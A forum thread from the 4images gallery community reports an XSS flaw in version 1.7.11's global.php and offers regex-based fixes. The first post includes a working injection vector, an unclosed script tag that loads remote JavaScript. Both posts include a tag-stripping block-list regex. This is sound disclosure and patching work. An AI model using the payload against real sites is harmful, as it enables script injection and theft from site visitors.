4images Forum & Community

4images Issues / Ausgaben => Feedback & Suggestions => Topic started by: jakovits on June 27, 2013, 06:56:16 PM

Title: 1.7.11 Security fix for XSS issue in global.php
Post by: jakovits on June 27, 2013, 06:56:16 PM

Hello

This is an unoffical security report and a fix for a XSS issue with unclosed html tags in global.php file in 4images gallery version 1.7.11.

Currently the clean_string() function in global.php removes unwanted tags, however it is unable to remove tags which are not closed properly.

For example, if you add the following line to an image comment field:

Code: [Select]

<script src="http://ha.ckers.org/xss.js?"
it will create a javascript popup every time the image description is viewed. This vector can be used to enable any XSS attack.

To fix this issue, in file global.php, before line 204, which is:

 $string = preg_replace('#</*(applet|meta|xml|blink|link|style|script|embed|object|iframe|frame|frameset|ilayer|layer|bgsound|title|base)[^>]*>#i',"",$string);

add two lines:

$string = preg_replace("/<([^<>]*)(?=<|$)/", "&lt$1",  $string); # replace unclosed '<'
$string = preg_replace("/(^|(?<=>))([^<>]*)>/", "$1&gt",  $string); # replace unopened '>'

As a result, any unclosed < or > characters will be replaced respectively with either &lt or &gt. Properly closed tags will remain as they were.


Jakovits

Title: Re: 1.7.11 Security fix for XSS issue in global.php
Post by: kai on July 15, 2013, 06:02:20 PM

or

find in "global.php"
   $string = preg_replace('#</*(applet|meta|xml|blink|link|style|script|embed|object|iframe|frame|frameset|ilayer|layer|bgsound|title|base)[^>]*>#i',"",$string);

and replace with
   $string = preg_replace('#</*(applet|meta|xml|blink|link|style|script|embed|object|iframe|frame|frameset|ilayer|layer|bgsound|title|base)[^>]*(>|$)#i',"",$string);